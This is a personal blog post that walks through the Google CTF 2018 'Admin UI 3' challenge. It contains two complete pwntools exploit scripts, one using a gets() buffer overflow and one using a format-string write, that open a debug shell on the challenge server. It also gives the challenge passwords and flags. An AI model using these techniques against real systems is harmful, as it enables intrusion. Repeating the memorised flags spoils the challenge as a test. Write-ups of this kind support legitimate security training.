Skip to content

YlmzCmlttn

Cemalettin Yılmaz Blog

Menu
  • Home
  • About Me
  • Projects
    • Iot-AR
    • Magnifi-AR
    • Smarthome-IOS
    • Others
  • Categories
    • Articles
    • Augmented Reality
    • Capture The Flag
      • Google CTF
        • 2018
    • Embedded Systems
    • IoT
    • Logisim
    • My Essays
    • Nvidia Jetson
      • Jetson TX1
    • Operating Systems
      • Kali
      • Raspbian
      • Ubuntu
    • Personal
    • Programming
      • Arduino
      • C
      • C#
      • Css
      • Html
      • Js
      • Matlab
      • Node.js
      • Python
      • Swift
      • VHDL
    • Projects
      • Embedded Systems
      • Electric
      • IoT
      • IoT-AR
      • Logisim
      • Magnifi-AR
      • Pose Estimation
    • Raspberry Pi
    • Xilinx
    • Others
Menu

Admin UI 3 | Google CTF 2018

Posted on March 24, 2019 by Yılmaz Cemalettin

Google CTF 2018

Admin UI 3

The code quality here is terrible. Even the temperature scale is measured in “Kevins”. Just bad Q/A all around here. If they choose to measure in Kevins rather than Kelvins, then it’s a sure bet that they can’t handle their memory properly. It looks like this also controls the SmartFridge2000 internal temperature for that whole home “just-works” experience.

You can find my all CTF solution in here

Question gives clue about memory vulnaribities.

When I look command_line function in IDA I saw the shell input.

When I look at the shell funciton I figure out the _ZL13shell_enabled flag. If this flag xor 1 is true. debug_shell() can be called. Otherwise shell can’t open.

If we change _ZL13shell_enabled value from memory we can open the shell.

 

They use the gets() function rather than fgets() so that we can use the Bufffer Overflow.

Also in the “echo” side program have format strings vulnerability.

 

When I test format strings vulnerability;

 

First I want to try to overflow buffer.

I want to jump this bellow adress so that I write script for that,

.text:0000000041414227 _Z11debug_shellv proc near

Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
from struct import pack
r = remote('mngmnt-iface.ctfcompetition.com',1337)
print r.recvuntil("3) Quit")
r.send("1\n\n")
print "1"
print r.recvuntil("password")
r.send("CTF{I_luv_buggy_sOFtware}\n")
print "CTF{I_luv_buggy_sOFtware}\n"
print r.recvuntil("password")
r.send("CTF{Two_PasSworDz_Better_th4n_1_k?}\n")
print "CTF{Two_PasSworDz_Better_th4n_1_k?}\n"
print r.recvuntil("Authenticated")
r.send("a"*0x38+"\x27\x42\x41\x41\x00\x00\x00\x00\n")
r.send("quit\n")
r.interactive()

Output:

CTF{c0d3ExEc?W411_pL4y3d}

I found the flag but we can also use the format string using echo

I also write script for that

Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
from struct import pack
r = remote('mngmnt-iface.ctfcompetition.com',1337)
print r.recvuntil("3) Quit")
r.send("1\n\n")
print "1"
print r.recvuntil("password")
r.send("CTF{I_luv_buggy_sOFtware}\n")
print "CTF{I_luv_buggy_sOFtware}\n"
print r.recvuntil("password")
r.send("CTF{Two_PasSworDz_Better_th4n_1_k?}\n")
print "CTF{Two_PasSworDz_Better_th4n_1_k?}\n"
print r.recvuntil("Authenticated")
r.send("echo A%40$llnABC\x38\x61\x61\x41\x00\x00\x00\x00\n")
r.send("shell\n")
r.interactive()

 

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

My Motto

“Learn to share, Share to learn”

LinkedIn Badge

Cemalettin Yılmaz

Ads

Archives

Categories

  • Articles (1)
  • Augmented Reality (3)
  • Capture The Flag (23)
    • Google CTF (22)
      • 2018 (13)
      • 2019 (9)
    • PicoCTF (1)
      • 2019 (1)
  • Embedded Systems (3)
  • IoT (3)
  • Logisim (1)
  • My Essays (3)
  • Nvidia Jetson (5)
    • Xavier (5)
  • Operating Systems (24)
    • Kali (3)
    • Raspbian (2)
    • Ubuntu (21)
  • Others (1)
  • Personal (1)
  • Programming (44)
    • Arduino (4)
    • C (10)
    • C# (4)
    • C++ (5)
    • Css (1)
    • CUDA (6)
    • Html (1)
    • Js (2)
    • Libraries (5)
      • OpenCV (3)
      • OpenGL (2)
    • Matlab (14)
    • Node.js (5)
    • Python (6)
    • Swift (3)
  • Programs (4)
    • Tools (4)
  • Projects (21)
    • Books Solutions (8)
    • Electric (2)
    • Embedded Systems (2)
    • Energy Harvesting (1)
    • IoT (2)
    • IoT-AR (1)
    • Logisim (1)
    • Magnifi-AR (3)
    • Pose Estimation (3)
    • Smarthome-Ios (1)
  • Raspberry Pi (3)
  • Uncategorized (2)
  • YZlib (1)

Recent Posts

  • atof stof stod problems with local floating point separator in C/C++
  • Pico CTF 2019 Answers
  • YZlib: Personal C++ Library
  • Drive to target | Google CTF 2019
  • FriendSpaceBookPlusAllAccessRedPremium | Google CTF 2019

Recent Comments

  • AbaShelha on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Peter on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Yılmaz Cemalettin on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • Yılmaz Cemalettin on 16-Bit CPU on Logisim
  • Jenny on 16-Bit CPU on Logisim
  • MOON on 16-Bit CPU on Logisim
  • anti on Ghidra Installation on Ubuntu |18.04, 16.04, 14.04
  • hunkerjr on STOP GAN | Google CTF 2019
  • Shaq on 16-Bit CPU on Logisim
  • NURUL AFIQAH MOHD HASBULLAH on 16-Bit CPU on Logisim

Linkedln

© 2022 YlmzCmlttn | Powered by Superbs Personal Blog theme